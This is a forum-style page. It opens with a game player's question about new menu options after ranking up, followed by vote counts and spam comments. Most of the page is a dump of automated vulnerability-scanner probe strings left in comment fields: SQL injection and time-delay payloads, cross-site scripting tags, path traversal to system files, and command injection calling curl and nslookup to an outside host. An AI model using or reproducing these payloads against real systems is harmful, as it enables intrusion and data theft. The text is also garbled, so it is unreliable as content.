Hey guys,
whenever I reach a new rank the popup tells me that there are new options in the menu. Which options? The only thing I can see is the constant improvement of my modificator, so that I make more points when shooting an element. But apart from that I can't see anything new...
What am I missing?
527 agree
Unvote8109 agree
2895 agree
835 agree
808 agree
793 agree
788 agree
744 agree
742 agree
702 agree
700 agree
689 agree
679 agree
672 agree
664 agree
640 agree
627 agree
626 agree
616 agree
615 agree
613 agree
605 agree
602 agree
601 agree
599 agree
595 agree
590 agree
565 agree
559 agree
558 agree
545 agree
541 agree
533 agree
531 agree
530 agree
527 agree
526 agree
520 agree
518 agree
513 agree
511 agree
505 agree
503 agree
499 agree
499 agree
492 agree
492 agree
478 agree
471 agree
470 agree
448 agree
Kina
I wanted to thank you for this great read!! I certainly enjoyed every little bit of it. I have got you bookmarked to look at new things you post… aid ukraineMagdalena
We're a gaggle of volunteers and starting a new scheme in our community. Your website provided us with helpful info to work on. You have performed a formidable process and our entire group shall be grateful to you. save refugesDrew
I know this if off topic but I'm looking into starting my own weblog and was wondering what all is required to get set up? I'm assuming having a blog like yours would cost a pretty penny? I'm not very web savvy so I'm not 100% positive. Any recommendations or advice would be greatly appreciated. Appreciate it help refugeslxbfYeaa
1lxbfYeaa
1JJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1Cla6DrvgYO1DsLkBcFmrO
1WfxYANoW
${10000493+10000249}WfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgAnonymous
1WfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg${10000049+10000344}
1WfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
response.write(9061818*9393343)WfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
file:///etc/passwdWfxYANoW
echo wjrvpu$()\ cqryce\nz^xyu||a #' &echo wjrvpu$()\ cqryce\nz^xyu||a #|" &echo wjrvpu$()\ cqryce\nz^xyu||a #WfxYANoW
&echo assowd$()\ rjevin\nz^xyu||a #' &echo assowd$()\ rjevin\nz^xyu||a #|" &echo assowd$()\ rjevin\nz^xyu||a #WfxYANoW
1WfxYANoW
../1WfxYANoW
IqL3RqPYWfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
'+response.write(9061818*9393343)+'WfxYANoW
"+response.write(9061818*9393343)+"WfxYANoW
1&echo zuztus$()\ oqhptx\nz^xyu||a #' &echo zuztus$()\ oqhptx\nz^xyu||a #|" &echo zuztus$()\ oqhptx\nz^xyu||a #WfxYANoW
1&n948615=v948957WfxYANoW
e62Ijvbn: CDHLHuYgWfxYANoW
http://bxss.me/t/fit.txt?.jpgBUXWfD3E
1WfxYANoW
|echo yqjtgj$()\ sgcwrv\nz^xyu||a #' |echo yqjtgj$()\ sgcwrv\nz^xyu||a #|" |echo yqjtgj$()\ sgcwrv\nz^xyu||a #XFKVGuFk: D6kn94Dx
1file:///etc/passwd
1response.write(9496014*9570030)
1WfxYANoW&n920914=v957372
1THJjeG0wc0Q=
1WfxYANoW
/etc/shellsWfxYANoW
1|echo mfkgmi$()\ zwpdhs\nz^xyu||a #' |echo mfkgmi$()\ zwpdhs\nz^xyu||a #|" |echo mfkgmi$()\ zwpdhs\nz^xyu||a #'+response.write(9496014*9570030)+'
1WfxYANoW
(nslookup -q=cname hituswtbnzyujad900.bxss.me||curl hituswtbnzyujad900.bxss.me))WfxYANoW
../../../../../../../../../../../../../../etc/shellsWfxYANoW
1"+response.write(9496014*9570030)+"
1WfxYANoW
c:/windows/win.iniWfxYANoW
1WfxYANoW
'.gethostbyname(lc('hitio'.'wnrbdskbce8b9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(68).chr(116).chr(84).'WfxYANoW
$(nslookup -q=cname hitfkiiereckt842c4.bxss.me||curl hitfkiiereckt842c4.bxss.me)../WfxYANoW
1WfxYANoW
&nslookup -q=cname hitrnjfnubejodc9b2.bxss.me&'\"`0&nslookup -q=cname hitrnjfnubejodc9b2.bxss.me&`'WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
)WfxYANoW
&(nslookup -q=cname hitxitlkyrkfs809d2.bxss.me||curl hitxitlkyrkfs809d2.bxss.me)&'\"`0&(nslookup -q=cname hitxitlkyrkfs809d2.bxss.me||curl hitxitlkyrkfs809d2.bxss.me)&`'WfxYANoW
';print(md5(31337));$a='WfxYANoW
|(nslookup -q=cname hitrwdcpsfnma3c9d1.bxss.me||curl hitrwdcpsfnma3c9d1.bxss.me)WfxYANoW
'"()WfxYANoW
";print(md5(31337));$a="WfxYANoW
bxss.meWfxYANoW
1'&&sleep(27*1000)*etcwtp&&'WfxYANoW
".gethostbyname(lc("hitls"."euiudnbk25375.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(85).chr(103).chr(88)."WfxYANoW
${@print(md5(31337))}WfxYANoW
gethostbyname(lc('hittt'.'qnppcsob91922.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(74).chr(104).chr(68)WfxYANoW
`(nslookup -q=cname hitrzivwwkzdicacab.bxss.me||curl hitrzivwwkzdicacab.bxss.me)`WfxYANoW
1"&&sleep(27*1000)*ilhgpu&&"WfxYANoW
${@print(md5(31337))}\WfxYANoW
!(()&&!|*|*|WfxYANoW
'.print(md5(31337)).'WfxYANoW
;(nslookup -q=cname hitvjntkiizkxe55db.bxss.me||curl hitvjntkiizkxe55db.bxss.me)|(nslookup -q=cname hitvjntkiizkxe55db.bxss.me||curl hitvjntkiizkxe55db.bxss.me)&(nslookup -q=cname hitvjntkiizkxe55db.bxss.me||curl hitvjntkiizkxe55db.bxss.me)1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1WfxYANoW
1'||sleep(27*1000)*gidoyd||'WfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))WfxYANoW
1WfxYANoW
^(#$!@#$)(()))******WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitosnmchiyfd41f4e.bxss.me||curl${IFS}hitosnmchiyfd41f4e.bxss.me)WfxYANoW
1"||sleep(27*1000)*mvcyml||"Http://bxss.me/t/fit.txt
1WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitwyirlstbxwf756f.bxss.me||curl${IFS}hitwyirlstbxwf756f.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitwyirlstbxwf756f.bxss.me||curl${IFS}hitwyirlstbxwf756f.bxss.me)&`'WfxYANoW
1http://bxss.me/t/fit.txt?.jpg
1WfxYANoW
xfs.bxss.me)
1'"()
1xfs.bxss.me
1/etc/shells
1!(()&&!|*|*|
1WfxYANoW'&&sleep(27*1000)*geunxz&&'
1WfxYANoW
'"^(#$!@#$)(()))******
1';print(md5(31337));$a='
1WfxYANoW"&&sleep(27*1000)*fnlrzm&&"
1";print(md5(31337));$a="
1WfxYANoW
1'"()&%<zzz><ScRiPt >RkLk(9867)</ScRiPt>WfxYANoW
<!--WfxYANoW'||sleep(27*1000)*jvklfv||'
1c:/windows/win.ini
1'"
1WfxYANoW"||sleep(27*1000)*bkeyju||"
1bxss.me
1${@print(md5(31337))}
1WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
commentWfxYANoW
bxss.me/t/xss.html?%00${@print(md5(31337))}\
1WfxYANoW
comment'.print(md5(31337)).'
1WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(113).concat(87).concat(113).concat(88)+(require"socket" Socket.gethostbyname("hitjr"+"frgbsklq5c8fe.bxss.me.")[3].to_s)+"WfxYANoW
'"()&%<zzz><ScRiPt >RkLk(9992)</ScRiPt>HttP://bxss.me/t/xss.html?%00
1WfxYANoW
comment/.<!--
1bxss.me/t/xss.html?%00
1comment
1WfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(106).concat(89).concat(118).concat(83)+(require'socket' Socket.gethostbyname('hitbl'+'hovombkd5ec38.bxss.me.')[3].to_s)+'comment
1WfxYANoW
'A'.concat(70-3).concat(22*4).concat(106).concat(88).concat(102).concat(85)+(require'socket' Socket.gethostbyname('hitaz'+'sdcwjkda09e03.bxss.me.')[3].to_s)WfxYANoW
19459339comment/.
1WfxYANoW
bfg9272<s1﹥s2ʺs3ʹhjl9272WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW
<th:t="${dfb}#foreachWfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
1WfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >RkLk(9092)</ScRiPt>WfxYANoW
1<WEUJ0H>A9LQ7[!+!]</WEUJ0H>WfxYANoW
1<script>RkLk(9479)</script>WfxYANoW
1<script>RkLk(9001)</script>9001WfxYANoW
1<ScR<ScRiPt>IpT>RkLk(9285)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >RkLk(9419)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9594></ScRiPt>WfxYANoW
1<ScRiPt >RkLk(9473)</ScRiPt>WfxYANoW
1IqYPFxJDWfxYANoW
1<isindex type=image src=1 onerror=RkLk(9783)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9443'>WfxYANoW
1<body onload=RkLk(9355)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=RkLk(9696)>WfxYANoW
1<img src=xyz OnErRor=RkLk(9209)>WfxYANoW
1<img/src=">" onerror=alert(9439)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%52%6B%4C%6B%289576%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1\u003CScRiPt\RkLk(9092)\u003C/sCripT\u003EWfxYANoW
1<ScRiPt>RkLk(9769)</sCripT>WfxYANoW
1<input autofocus onfocus=RkLk(9930)>WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1WfxYANoW
1}body{zzz:Expre/**/SSion(RkLk(9639))}WfxYANoW
-1 OR 2+289-289-1=0+0+0+1 --WfxYANoW
-1 OR 2+267-267-1=0+0+0+1WfxYANoW
1ueE9B <ScRiPt >RkLk(9143)</ScRiPt>WfxYANoW
-1' OR 2+406-406-1=0+0+0+1 --WfxYANoW
1<WW6BKT>SQNVQ[!+!]</WW6BKT>WfxYANoW
-1' OR 2+856-856-1=0+0+0+1 or 'NJCM2fLY'='WfxYANoW
-1" OR 2+828-828-1=0+0+0+1 --WfxYANoW
1'"WfxYANoW
1<ifRAme sRc=9031.com></IfRamE>WfxYANoW
@@HCYTXWfxYANoW
1<aPX2hhm x=9339>WfxYANoW
1<img sRc='http://attacker-9406/log.php?WfxYANoW
1<ayeFgkZ<WfxYANoW'"()&%<zzz><ScRiPt >RkLk(9006)</ScRiPt>
1'"()&%<zzz><ScRiPt >RkLk(9523)</ScRiPt>
1WfxYANoW9433407
1bfg9623<s1﹥s2ʺs3ʹhjl9623
1<%={{={@{#{${dfb}}%>
1<th:t="${dfb}#foreach
11}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1WfxYANoW
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >RkLk(9003)</ScRiPt>
1WfxYANoW<WR6W8W>PYZFJ[!+!]</WR6W8W>
1WfxYANoW<script>RkLk(9711)</script>
1WfxYANoW<script>RkLk(9300)</script>9300
1WfxYANoW<ScRiPt >RkLk(9968)</ScRiPt>
1WfxYANoW
1WfxYANoW<ScRiPt >RkLk(9165)</ScRiPt>
1WfxYANoW<body onload=RkLk(9731)>
1WfxYANoW<img src=xyz OnErRor=RkLk(9116)>
1WfxYANoW<img/src=">" onerror=alert(9836)>
1WfxYANoW\u003CScRiPt\RkLk(9415)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>RkLk(9309)</sCripT>
1WfxYANoW<input autofocus onfocus=RkLk(9083)>
1<a HrEF=http://xss.bxss.me></a>
1WfxYANoWwFpumCVv
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(RkLk(9338))}
1WfxYANoWv8skv <ScRiPt >RkLk(9602)</ScRiPt>
1WfxYANoW<WWDD0P>AHFOB[!+!]</WWDD0P>
1WfxYANoW<ifRAme sRc=9953.com></IfRamE>
1WfxYANoW<aHKqbGC x=9432>
1WfxYANoW<img sRc='http://attacker-9221/log.php?
1WfxYANoW<avPVvgc<
1WfxYANoW
1-1 OR 2+175-175-1=0+0+0+1 --
1-1 OR 2+809-809-1=0+0+0+1
1-1' OR 2+236-236-1=0+0+0+1 --
1-1' OR 2+168-168-1=0+0+0+1 or 'gxLokiXx'='
1-1" OR 2+425-425-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWEDjznQMF'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@DFiUl
1Pecedec150
555-555-0199@example.comPecedec150
555-555-0199@example.comaqavaqfr
1keojlvah
1kpgxtvkv
response.write(9155574*9245481)eedhsbph
set|set&setkeojlvah
1kpgxtvkv
'+response.write(9155574*9245481)+'ftuqjatt
Qb81NeOeeedhsbph
$(nslookup KyjOWsiH)keojlvah
qBZ54m9xkpgxtvkv
"+response.write(9155574*9245481)+"wqialnjm
../../../../../../../../../../etc/passwdeEqO9iOT
1eedhsbph
&nslookup HDCoZm1z&'\"`0&nslookup HDCoZm1z&`'keojlvah
-1 OR 2+289-289-1=0+0+0+1 --response.write(9835211*9489462)
1wqialnjm
../../../../../../../../../../../../../../../proc/versionyvkoehcf
1set|set&set
1keojlvah
-1 OR 2+763-763-1=0+0+0+1'+response.write(9835211*9489462)+'
1wqialnjm
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg$(nslookup ehJMDHWF)
1keojlvah
-1' OR 2+539-539-1=0+0+0+1 --"+response.write(9835211*9489462)+"
1wqialnjm
../../../../../../../../../../etc/passwd.jpg&nslookup Bz4ox2gN&'\"`0&nslookup Bz4ox2gN&`'
1rayspxax
${9999538+10000357}keojlvah
-1' OR 2+325-325-1=0+0+0+1 or '7sQsfjhv'='yiwextrp
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpgT3dENVF3SjA=
1wqialnjm
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgstetrfmx
1&n903155=v985364${10000236+9999316}
1keojlvah
-1" OR 2+903-903-1=0+0+0+1 --yiwextrp
1some_inexistent_file_with_long_name.jpgdacooilo
)wqialnjm
/../..//../..//../..//../..//../..//etc/passwd.jpgyvkoehcf
1keojlvah
if(now()=sysdate(),sleep(13),0)/*'XOR(if(now()=sysdate(),sleep(13),0))OR'"XOR(if(now()=sysdate(),sleep(13),0))OR"*/yiwextrp
Http://testasp.vulnweb.com/t/fit.txtdacooilo
!(()&&!|*|*|wqialnjm
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdexroxwfk&n976895=v937991
1Anonymous
1pboiffhn
'"()keojlvah
(select(0)from(select(sleep(13)))v)/*'+(select(0)from(select(sleep(13)))v)+'"+(select(0)from(select(sleep(13)))v)+"*/yiwextrp
http://testasp.vulnweb.com/t/fit.txt?.jpgdacooilo
^(#$!@#$)(()))******wqialnjm
/etc/passwdkeojlvah
-1; waitfor delay '0:0:13' --yiwextrp
testasp.vulnweb.com)
1wqialnjm
%2fetc%2fpasswdivcvjxrp
;print(md5(acunetix_wvs_security_test));'"()
1keojlvah
-1); waitfor delay '0:0:13' --!(()&&!|*|*|
1wqialnjm
/.././.././.././.././.././.././.././../etc/./passwd%00ivcvjxrp
';print(md5(acunetix_wvs_security_test));$a='pdjegsyg
http://testasp.vulnweb.com/t/xss.html?%00.jpgchavfqpr
1keojlvah
1 waitfor delay '0:0:4' --1some_inexistent_file_with_long_name.jpg
1^(#$!@#$)(()))******
1ffyvhaqc
http://hitZcf3KYbyp0.bxss.me/wqialnjm
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdivcvjxrp
";print(md5(acunetix_wvs_security_test));$a="http://testasp.vulnweb.com/t/xss.html?%00.jpg
1chavfqpr
commentkeojlvah
1 waitfor delay '0:0:0' --Http://testasp.vulnweb.com/t/fit.txt
1emgptjtt
1http://hitAsPYjhn1j0.bxss.me/
1wqialnjm
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwdivcvjxrp
${@print(md5(acunetix_wvs_security_test))}rwuuxyqm
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))chavfqpr
commentkeojlvah
XMarySaf'; waitfor delay '0:0:4' --http://testasp.vulnweb.com/t/fit.txt?.jpg
1emgptjtt
1'"noqfjont
/www.vulnweb.comivcvjxrp
${@print(md5(acunetix_wvs_security_test))}\chavfqpr
comment/.keojlvah
SsyEDWfQ'; waitfor delay '0:0:9' --testasp.vulnweb.com
1emgptjtt
\/www.vulnweb.com
1wqialnjm
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.;print(md5(acunetix_wvs_security_test));
1udfvaece
'"chavfqpr
1keojlvah
-1;select pg_sleep(4); --hspppldm
1'"()&%<acx><ScRiPt >jHw5(9956)</ScRiPt>wqialnjm
file:///etc/passwd';print(md5(acunetix_wvs_security_test));$a='
1udfvaece
<!--comment
1keojlvah
-1;select pg_sleep(13); --emgptjtt
@@cDlfiwqialnjm
/\../\../\../\../\../\../\../etc/passwd";print(md5(acunetix_wvs_security_test));$a="
1'"
1comment
1keojlvah
-1);select pg_sleep(9); --emgptjtt
JyI=hspppldm
'"()&%<acx><ScRiPt >jHw5(9358)</ScRiPt>wqialnjm
WEB-INF/web.xml${@print(md5(acunetix_wvs_security_test))}
1<!--
1comment/.
1keojlvah
-1));select pg_sleep(9); --wqialnjm
/WEB-INF/web.xml${@print(md5(acunetix_wvs_security_test))}\
1keojlvah
NIBhZYLA';select pg_sleep(9); --hspppldm
1_9728wqialnjm
WEB-INF\web.xmlemgptjtt
(select convert(int,CHAR(65)))keojlvah
hBYYGZl3');select pg_sleep(13); --../../../../../../../../../../etc/passwd
1emgptjtt
1keojlvah
DttpIjLH'));select pg_sleep(13); --hspppldm
acu8545<s1﹥s2ʺs3ʹuca85451'"
1keojlvah
1\
1keojlvah
1../../../../../../../../../../etc/passwd.jpg
1xyUqU24j
1@@nasPe
1-1 OR 2+835-835-1=0+0+0+1 --
1hspppldm
{{9999195*10000387}}JyI=
1-1 OR 2+883-883-1=0+0+0+1
1.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1-1' OR 2+844-844-1=0+0+0+1 --
1hspppldm
1<ScRiPt >jHw5(9147)</ScRiPt>/etc/passwd
1-1' OR 2+855-855-1=0+0+0+1 or 'ZKstokBc'='
1%2fetc%2fpasswd
1(select convert(int,CHAR(65)))
1-1" OR 2+541-541-1=0+0+0+1 --
1hspppldm
1<WWRJV5>18ZCQ[!+!]</WWRJV5>hspppldm
1<script>jHw5(9373)</script>1 waitfor delay '0:0:9' --
1YmAwvwWZ'; waitfor delay '0:0:9' --
1AAtJp0Sq';select pg_sleep(13); --
1hspppldm
1<ScR<ScRiPt>IpT>jHw5(9400)</sCr<ScRiPt>IpT>u8HpaCgC');select pg_sleep(13); --
1file:///etc/passwd
1PAfCITmV'));select pg_sleep(13); --
1/\../\../\../\../\../\../\../etc/passwd
1hspppldm
1<ScRiPt >jHw5(9771)</ScRiPt>WEB-INF/web.xml
1/WEB-INF/web.xml
1hspppldm
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9863></ScRiPt>WEB-INF\web.xml
1hspppldm
1<ScRiPt >jHw5(9025)</ScRiPt>hspppldm
1<video><source onerror="javascript:jHw5(9074)">hspppldm
1<isindex type=image src=1 onerror=jHw5(9227)>hspppldm
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9593'>hspppldm
1<body onload=jHw5(9884)>hspppldm
1<img src=//testasp.vulnweb.com/t/dot.gif onload=jHw5(9587)>hspppldm
1<img src=xyz OnErRor=jHw5(9233)>hspppldm
1<img/src=">" onerror=alert(9231)>hspppldm
%31%3C%53%63%52%69%50%74%20%3E%6A%48%77%35%289962%29%3C%2F%73%43%72%69%70%54%3Ehspppldm
1\u003CScRiPt\jHw5(9120)\u003C/sCripT\u003Ehspppldm
1<ScRiPt>jHw5(9085)</sCripT>hspppldm
1<input autofocus onfocus=jHw5(9383)>hspppldm
<a HrEF=http://www.vulnweb.com></a>hspppldm
<a HrEF=jaVaScRiPT:>hspppldm
[url=http://www.vulnweb.com][/url]hspppldm
1<img<!-- --> src=x onerror=alert(9986);//><!-- -->hspppldm
1}body{acu:Expre/**/SSion(jHw5(9671))}hspppldm
1<% contenteditable onresize=jHw5(9007)>hspppldm
1_gL85o <ScRiPt >jHw5(9246)</ScRiPt>hspppldm
1<WQ0N9Y>GVZD3[!+!]</WQ0N9Y>hspppldm
1<ifRAme sRc=9093.com></IfRamE>hspppldm
1<3o8had x=9990>hspppldm
1<img sRc='http://attacker-9651/log.php?hspppldm'"()&%<acx><ScRiPt >jHw5(9331)</ScRiPt>
1'"()&%<acx><ScRiPt >jHw5(9291)</ScRiPt>
1hspppldm_9743
1acu6870<s1﹥s2ʺs3ʹuca6870
1{{9999738*10000344}}
1hspppldm<ScRiPt >jHw5(9141)</ScRiPt>
1hspppldm<WPRXCH>XQKUV[!+!]</WPRXCH>
1hspppldm<script>jHw5(9372)</script>
1hspppldm<ScRiPt >jHw5(9480)</ScRiPt>
1hspppldm<ScRiPt >jHw5(9568)</ScRiPt>
1hspppldm<body onload=jHw5(9983)>
1hspppldm<img src=xyz OnErRor=jHw5(9527)>
1hspppldm<img/src=">" onerror=alert(9561)>
1hspppldm\u003CScRiPt\jHw5(9804)\u003C/sCripT\u003E
1hspppldm<ScRiPt>jHw5(9403)</sCripT>
1hspppldm<input autofocus onfocus=jHw5(9379)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1hspppldm}body{acu:Expre/**/SSion(jHw5(9943))}
1hspppldm<% contenteditable onresize=jHw5(9732)>
1hspppldm_zJ1el <ScRiPt >jHw5(9560)</ScRiPt>
1hspppldm<WNRQFP>GUKPH[!+!]</WNRQFP>
1hspppldm<ifRAme sRc=9168.com></IfRamE>
1hspppldm<UGZm8Q x=9905>
1hspppldm<img sRc='http://attacker-9271/log.php?
1dwUQQUrL
1dwUQQUrL
1dwUQQUrL
1dwUQQUrL
1Y6U7w1g3dwUQQUrL
1dwUQQUrL
-1 OR 2+768-768-1=0+0+0+1 --dwUQQUrL
-1 OR 2+280-280-1=0+0+0+1dwUQQUrL
-1' OR 2+112-112-1=0+0+0+1 --dwUQQUrL
-1' OR 2+583-583-1=0+0+0+1 or '8hvRgpaL'='dwUQQUrL
-1" OR 2+90-90-1=0+0+0+1 --dwUQQUrL
1*if(now()=sysdate(),sleep(15),0)dwUQQUrL
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZdwUQQUrL
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZdwUQQUrL
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/dwUQQUrL
1-1; waitfor delay '0:0:15' --dwUQQUrL
1-1); waitfor delay '0:0:15' --dwUQQUrL
1-1 waitfor delay '0:0:15' --dwUQQUrL
1Jry1O0Xy'; waitfor delay '0:0:15' --dwUQQUrL
1-1 OR 281=(SELECT 281 FROM PG_SLEEP(15))--dwUQQUrL
1-1) OR 303=(SELECT 303 FROM PG_SLEEP(15))--dwUQQUrL
1-1)) OR 341=(SELECT 341 FROM PG_SLEEP(15))--dwUQQUrL
1RiFNb8yy' OR 326=(SELECT 326 FROM PG_SLEEP(15))--dwUQQUrL
1q0RTGXth') OR 909=(SELECT 909 FROM PG_SLEEP(15))--dwUQQUrL
1ZCnOdJFq')) OR 378=(SELECT 378 FROM PG_SLEEP(15))--dwUQQUrL
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)dwUQQUrL
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'dwUQQUrL
1dwUQQUrL
1'"dwUQQUrL
@@sZ7nVdwUQQUrL
1dwUQQUrL
1dwUQQUrLisy97VUz
1dwUQQUrL
1-1 OR 2+704-704-1=0+0+0+1 --
1-1 OR 2+98-98-1=0+0+0+1
1-1' OR 2+968-968-1=0+0+0+1 --
1-1' OR 2+78-78-1=0+0+0+1 or 'EBuZslgr'='
1-1" OR 2+332-332-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1dwUQQUrL-1 waitfor delay '0:0:15' --
1dwUQQUrLWeq4bWH5'; waitfor delay '0:0:15' --
1dwUQQUrL
1dwUQQUrL'"
1@@HpDLA
1dwUQQUrL
1Comment